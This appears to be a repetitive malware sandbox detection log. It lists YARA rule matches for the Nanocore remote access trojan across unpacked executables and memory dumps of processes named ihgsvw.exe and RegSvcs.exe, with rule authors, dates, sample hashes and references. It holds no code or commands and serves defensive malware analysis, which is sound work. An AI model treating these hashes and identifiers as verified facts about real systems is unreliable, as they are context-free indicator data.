Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
